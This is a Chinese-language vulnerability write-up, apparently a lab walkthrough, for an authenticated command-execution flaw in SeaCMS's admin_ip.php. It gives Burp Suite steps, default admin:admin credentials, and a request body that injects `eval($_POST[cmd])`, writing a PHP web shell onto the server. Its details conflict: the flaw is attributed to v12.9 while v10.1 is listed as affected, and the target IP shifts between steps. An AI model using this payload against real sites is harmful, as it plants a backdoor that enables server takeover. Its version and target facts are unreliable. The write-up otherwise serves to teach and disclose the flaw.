1 【漏洞说明】
SeaCMS v12.9存在命令执行漏洞,在manager/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
2 【漏洞等级】
高危
3【影响版本】
SeaCMS v10.1
4【利用条件】
需要后台管理员权限
5【cms源码包】
链接:百度网盘 请输入提取码 提取码:1234
6 【靶标利用过程】
6.1打开kali,访问站点192.168.0.2
6.2访问管理员登录界面 http://192.168.0.5/manager/login.php
6.3使用账号密码admin:admin登录 界面如下
6.4点击系统,点击后台IP安全设置
6.5接下来使用burp抓取数据包,构造数据包发送payload 打开burp
6.6进入proxy模块中点击options查看burp端口信息
6.7打开火狐浏览器设置,点击右上角三横标志,下拉,点击preferences
6.8在输入框输入proxy,并点击settings
6.9开启火狐浏览器代理,并将代理信息改为burp中的信息,点击确认
6.10点击确认 6.11burp抓到数据包,右键选择send to repeater发送到repeater模块
6.12请求体改为 v=0&ip=+11111111111";phpinfo();eval($_POST[cmd]);//
6.13回到porxy代理模块关闭抓包
6.14访问写入页面 http://192.168.0.6/manager/admin_ip.php
7【漏洞分析】
SeaCMS v12.9存在命令执行漏洞,在manager/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
8【漏洞修复】
升级到最新版本
特别声明:
此文章仅供参考,如用作非法交易造成一定损失或触犯法律,作者一概不负!!!!! 请勿用于非法途径,仅供参考。传送门 -----------> 《中华人民共和国网络安全法》
1584
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
